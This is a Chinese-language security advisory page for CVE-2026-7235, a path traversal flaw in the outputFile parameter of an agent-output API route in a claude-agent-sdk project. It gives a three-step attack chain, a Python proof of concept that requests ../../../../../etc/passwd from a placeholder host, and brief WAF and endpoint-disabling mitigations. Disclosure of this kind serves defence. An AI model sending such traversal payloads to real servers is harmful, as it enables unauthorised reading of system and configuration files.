IPBUF安全漏洞报告
English
CVE-2026-7235 CVSS 5.3 中危

CVE-2026-7235: claude-agent-sdk路径遍历漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-7235
漏洞类型
路径遍历
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ErlichLiu claude-agent-sdk-master

相关标签

路径遍历Path TraversalCVE-2026-7235claude-agent-sdkWeb安全无需认证

漏洞概述

ErlichLiu 的 claude-agent-sdk-master 项目存在安全漏洞,影响 `app/api/agent-output/route.ts` 文件中的未知功能。由于未正确过滤 `outputFile` 参数,攻击者可利用路径遍历漏洞远程读取系统敏感文件。该漏洞已公之于众且可被利用,目前官方尚未对此问题做出回应,需引起重视。

技术细节

该漏洞源于 `app/api/agent-output/route.ts` 文件中对用户输入参数 `outputFile` 的处理逻辑存在缺陷。开发人员未对传入的文件路径参数进行严格的边界检查和规范化处理,导致攻击者能够传入包含路径遍历字符(如 `../`)的恶意字符串。利用这一漏洞,未经认证的攻击者可以通过网络远程发起攻击,绕过应用根目录限制,进而读取服务器文件系统上的任意敏感文件。虽然 CVSS 评分显示其对机密性的影响仅为“低”,且不影响完整性和可用性,但在实际攻击场景中,泄露配置文件或源代码等信息可能为后续的深入攻击提供关键数据,因此风险不容忽视。

攻击链分析

STEP 1
侦察
攻击者识别目标运行的是 ErlichLiu/claude-agent-sdk-master 项目,并确定存在 /api/agent-output 接口。
STEP 2
漏洞探测
攻击者向 /api/agent-output 接口发送带有 `outputFile=../../../../../etc/passwd` 参数的请求,测试是否存在路径遍历。
STEP 3
数据窃取
服务器响应返回 /etc/passwd 文件的内容,攻击者成功读取敏感信息,并可能进一步尝试读取配置文件或源代码。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://vulnerable-host/api/agent-output" # Malicious payload to traverse to /etc/passwd # Using '../' to escape the current directory payload = { "outputFile": "../../../../../etc/passwd" } try: # Sending the malicious request response = requests.get(target_url, params=payload) # Checking if the exploit was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! Sensitive file content:") print(response.text) else: print("[-] Exploit failed or target is patched.") print("Status Code:", response.status_code) print("Response:", response.text[:200]) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

ErlichLiu claude-agent-sdk-master <= b185aa7ff0d864581257008077b4010fca1747bf

防御指南

临时缓解措施
在官方发布修复版本之前,建议通过配置 Web 应用防火墙(WAF)拦截包含路径遍历特征(如 `../` 或 `%2e%2e/`)的请求。同时,如果业务允许,可暂时禁用受影响的 `/api/agent-output` 接口以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表